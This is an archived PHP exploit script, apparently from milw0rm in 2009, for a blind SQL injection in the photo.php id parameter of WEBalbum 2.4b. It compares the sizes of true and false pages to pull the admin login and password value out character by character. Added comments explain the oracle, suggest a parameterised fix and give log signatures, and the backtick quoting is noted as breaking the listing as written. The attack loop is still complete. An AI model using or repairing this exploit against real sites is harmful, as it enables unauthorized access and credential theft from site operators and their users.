WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit
<?php
// NOTE(review): as transcribed, every string on this page is delimited with backticks.
// In PHP a backtick pair is the shell-execution operator, not a string quote, so the
// listing does not run as written; this looks like quote-mangling by the publishing
// site. The file is kept verbatim as an archival record of the technique.
ini_set(`max_execution_time`,0);
print_r('
##############################################################################
#
#                WEBalbum v2.4b Blind SQL Injection Exploit
#                 (Some webpages have a diffirint table name)
#                      ---->>>> xoron <<<<<-----
#                           xorontr@gmail.com
#                            XORON (c) 2009
#
#     WARNING!: php xoron.php `http://www.web-album.org/[PATH]/photo.php?id=1`
#
##############################################################################
');
// Entry point: the single CLI argument is a URL whose last query parameter is the
// photo id. Every request below appends a SQL predicate directly to that value, so the
// vulnerable sink is a `photo.php` query that interpolates `id` unparameterised.
// Server-side fix: bind `id` as an integer (prepared statement or (int) cast) so the
// appended predicate is never evaluated.
if ($argc > 1) {
$url = $argv[1];
// Calibrate the boolean oracle: $r is the response length for an always-true
// predicate, $w for an always-false one, and $t is the percentage size difference
// that separates a "true" page from a "false" page. Nothing is read from the body
// itself; only its length is compared, which is what makes this a blind technique.
// Detection: a pair of requests carrying `and 1=1--` / `and 1=0--` followed by a burst
// of `ascii(substring(` variants against the same id is a reliable log/WAF signature.
$r = strlen(file_get_contents($url.`+and+1=1--`));
echo `\nExploiting:\n`;
$w = strlen(file_get_contents($url.`+and+1=0--`));
$t = abs((100-($w/$r*100)));
echo `Username: `;
// Length discovery: probe positions 1..30 of the first row's `login` in the hard-coded
// `webalbum_users` table (the banner above notes the table name varies per install).
// The first position whose `ascii(...) != 0` test produces a "false"-profile page is
// treated as the end of the string; `$i = 30` is how the loop exits early.
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$i.`,1))!=0--`));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
// Character recovery for `login`: linear scan of the threshold $i from 46 upward in
// steps of 2, jumping from 60 straight to 98, so only '.', '/', the digits and 'a'..'z'
// are ever considered. The first $i whose `> $i` test looks "false" means the byte is
// <= $i; one more request against $i-1 decides between chr($i-1) and chr($i), and
// `$i = 122` ends the inner loop. Each output character therefore costs roughly a
// dozen HTTP requests, which is the volume a rate-based detector would see.
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.$i.`--`));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.($i-1).`--`));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo `\nPassword: `;
// Same scan for the `password` column, with a fixed 49 positions and an upper bound of
// 102 ('f'); that range is consistent with a stored hex digest rather than a cleartext
// value, though nothing on this page confirms the storage format. Defensive takeaway:
// the extracted value is whatever the column holds, so unsalted fast hashes offer
// little protection once this column is readable; `password_hash()` output does.
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+password+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.$i.`--`));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+password+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.($i-1).`--`));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?>

# milw0rm.com [2009-02-03]
